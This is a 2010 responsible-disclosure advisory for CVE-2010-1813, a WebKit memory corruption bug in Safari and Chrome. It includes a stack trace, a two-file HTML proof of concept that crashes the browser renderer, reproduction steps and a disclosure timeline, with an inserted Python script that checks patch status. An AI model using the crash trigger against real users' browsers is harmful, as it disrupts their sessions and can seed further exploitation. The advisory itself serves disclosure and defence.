Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) Memory Corrupt
Source: vfocus.net   Author: Vazquez   Published: 2010-09-13

TITLE: WEBKIT (APPLE SAFARI < 4.1.2/5.0.2 & GOOGLE CHROME < 5.0.375.125) MEMORY CORRUPTION VULNERABILITY
TESTED OS: WINDOWS XP SP3
SEVERITY: HIGH
CVE-NUMBER: CVE-2010-1813
DISCOVERED DATE: 2010-06-29
FIXED DATE: GOOGLE CHROME (2010-07-26) & APPLE SAFARI (2010-09-08)
FIXED VERSIONS: GOOGLE CHROME 5.0.375.125 & APPLE SAFARI 4.1.2/5.0.2
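The fixed versions above are the only defensive fact a practitioner needs from this advisory: an install is at risk when it predates the fix on its branch. The following is an added example (not part of the original advisory, not code from the author or the WebKit project) that turns those published thresholds into a patch-state check; it assumes a simple inventory of product/version pairs as input and handles the detail that Safari was fixed on two branches (4.1.2 for 4.x and 5.0.2 for 5.x), so Safari 5.0.1 is still vulnerable even though 5.0.1 > 4.1.2.

```python
"""Patch-state check for CVE-2010-1813 (WebKit memory corruption).

Added example, not part of the original advisory. It compares an installed
browser version against the fixed versions the advisory states:
Google Chrome 5.0.375.125 and Apple Safari 4.1.2 / 5.0.2.
"""
from typing import Dict, List, Tuple

# Fixed versions exactly as published in the advisory. Safari was fixed on
# two branches, so each branch carries its own threshold.
FIXED_VERSIONS: Dict[str, List[Tuple[int, ...]]] = {
    "chrome": [(5, 0, 375, 125)],
    "safari": [(4, 1, 2), (5, 0, 2)],
}


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '5.0.375.125' into (5, 0, 375, 125); reject anything non-numeric."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in parts)


def _product_key(product: str) -> str:
    """Map free-form product names ('Google Chrome', 'Apple Safari') to a key."""
    name = product.lower()
    for key in FIXED_VERSIONS:
        if key in name:
            return key
    raise KeyError(f"no fix data for {product!r}")


def is_vulnerable(product: str, version: str) -> bool:
    """Return True when `version` of `product` predates the fix on its branch.

    A version on a major branch that received a fix is vulnerable if it is
    below that branch's threshold. A version on a major branch older than
    every fixed branch (e.g. Safari 3.x) is treated as vulnerable, since no
    fix was shipped for it. A version on a newer major branch than any fixed
    one is assumed to carry the fix.
    """
    v = parse_version(version)
    thresholds = sorted(FIXED_VERSIONS[_product_key(product)])
    for fixed in thresholds:
        if v[0] == fixed[0]:
            return v < fixed  # lexicographic tuple compare, missing parts count as lower
    return v[0] < thresholds[-1][0]


def outdated(inventory: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Filter an inventory of (product, version) pairs down to those needing the fix."""
    return [(p, ver) for p, ver in inventory if is_vulnerable(p, ver)]


if __name__ == "__main__":
    # Constructed sample inventory for demonstration; not real host data.
    sample = [
        ("Google Chrome", "5.0.375.99"),
        ("Google Chrome", "5.0.375.125"),
        ("Apple Safari", "5.0.1"),
        ("Apple Safari", "4.1.2"),
        ("Apple Safari", "3.2.3"),
    ]
    for product, ver in outdated(sample):
        print(f"UPDATE NEEDED: {product} {ver} (CVE-2010-1813)")
```

The per-branch comparison is the part worth copying into a real asset-inventory check: a single "greater than the newest fixed version" test would wrongly mark Safari 4.1.2 as unpatched and, worse, a naive string comparison would rank "5.0.375.99" above "5.0.375.125".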
DISCOVERED BY: JOSE A. VAZQUEZ

======ABOUT APPLICATION======

"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version
of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and
JavaScript code began as a branch of the KHTML and KJS libraries from KDE..." copied from http://webkit.org/

======DESCRIPTION======

A memory corruption vulnerability was confirmed by the Chromium Security Team. The original stack trace showed a null
pointer dereference, but some pointers were also corrupted.

Stack trace (using Chrome symbols):

WebCore::RenderObject::containingBlock()  Line 597
WebCore::RenderBlock::paintContinuationOutlines()  Line 2344
WebCore::RenderBlock::paintObject()  Line 2232
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2447
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebCore::RenderWidget::paint()  Line 281
WebCore::InlineBox::paint()  Line 180
WebCore::InlineFlowBox::paint()  Line 682
WebCore::RootInlineBox::paint()  Line 167
WebCore::RenderLineBoxList::paint()  Line 219
WebCore::RenderBlock::paintContents()  Line 2090
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderBlock::paintChildren()  Line 2127
WebCore::RenderBlock::paintContents()  Line 2092
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2445
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebKit::WebFrameImpl::paintWithContext()  Line 1795
WebKit::WebFrameImpl::paint()  Line 1818
WebKit::WebViewImpl::paint()  Line 979
RenderWidget::PaintRect()  Line 390
RenderWidget::DoDeferredUpdate()  Line 501
RenderWidget::CallDoDeferredUpdate()  Line 428


======PROOF OF CONCEPT======

File 1.html:

<meta http-equiv="refresh" content="1;URL=1.html" >
<iframe src="2.html"></iframe>

File 2.html:

<dialog style='position:relative'>
 <h style='outline-style:auto'>X<div></div></h>
</dialog>


======STEPS TO REPRODUCE======

1.- Upload 1.html and 2.html to your server.
2.- Open file 1.html with the vulnerable application.

-Google Chrome:

3.- Wait for a while; the renderer crashes (sad tab).

-Apple Safari:

3.- Wait for a while; if no crash occurs, press Ctrl+T to trigger it.

======REFERENCES======

[ref-1] -> https://bugs.webkit.org/show_bug.cgi?id=41373
[ref-2] -> http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html
[ref-3] -> http://support.apple.com/kb/HT4334
[ref-4] -> http://spa-s3c.blogspot.com/2010/09/full-responsible-disclosurewebkit-apple.html


======DISCLOSURE TIMELINE======

Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)

[2010-06-29] => Posted new issue in Chromium Project (with pocs).
[2010-06-29] => Chromium confirmed memory corruption and opened new webkit bug.
[2010-07-26] => Chromium released new fix (Google Chrome 5.0.375.125).
[2010-09-08] => Apple released new fix (Apple Safari 4.1.2/5.0.2).
[2010-09-10] => Public disclosure.


======CREDITS======

Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/

